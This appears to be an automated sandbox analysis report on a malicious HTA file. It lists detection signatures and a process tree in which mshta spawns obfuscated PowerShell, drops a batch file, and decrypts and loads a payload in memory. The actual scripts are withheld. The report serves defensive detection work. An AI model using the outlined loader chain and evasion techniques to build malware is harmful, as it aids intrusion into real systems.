Windows
Analysis Report
hta.hta
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 2920, cmdline: mshta.exe "C:\Users\user\Desktop\hta.hta", MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 2136, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted followed by a long obfuscated PowerShell script that writes Note.txt and 15.bat under %AppData% and runs them (not reproduced), MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 3200, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- notepad.exe (PID: 7096, cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Note.txt, MD5: E92D3A824A0578A50D2DD81B5060145F)
- cmd.exe (PID: 6340, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\15.bat" ", MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4024, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3560, cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\15.bat", MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4832, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5532, cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\15.bat'; followed by a long obfuscated PowerShell stage that reads lines from 15.bat, AES-CBC-decrypts and GZip-decompresses them and loads the result with Assembly.Load (not reproduced), MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- powershell.exe (PID: 4268, cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 5328, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden, MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- svchost.exe (PID: 5252, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |

System Summary
Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)